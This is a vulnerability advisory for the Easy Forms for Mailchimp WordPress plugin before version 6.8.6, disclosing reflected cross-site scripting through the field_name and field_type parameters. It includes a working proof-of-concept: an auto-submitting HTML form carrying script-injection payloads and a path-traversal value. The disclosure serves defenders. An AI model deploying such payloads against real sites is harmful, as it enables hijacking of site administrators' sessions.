WordPress Plugin Vulnerabilities
Easy Forms for Mailchimp < 6.8.6 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape the field_name and field_type parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
Proof of Concept
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" id="hack" method="POST">
<input type="hidden" name="action" value="add_field_to_form" />
<input type="hidden" name="field_name" value='xxxxxxxxxxxx"><script>alert(/XSS-field_name/)</script>' />
<input type="hidden" name="field_type" value='"><script>alert(/XSS-field_type/)</script>' />
<input type="hidden" name="list_id" value="../../../../../" />
<input type="submit" value="Submit request" />
</form>
</body>
<script>
var form1 = document.getElementById('hack');
form1.submit();
</script>
</html>
Affects Plugins
Fixed in version 6.8.6
References
Classification
Miscellaneous
Original Researcher
JrXnm
Submitter
JrXnm
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-12-21 (about 6 months ago)
Added
2021-12-21 (about 6 months ago)
Last Updated
2022-04-16 (about 2 months ago)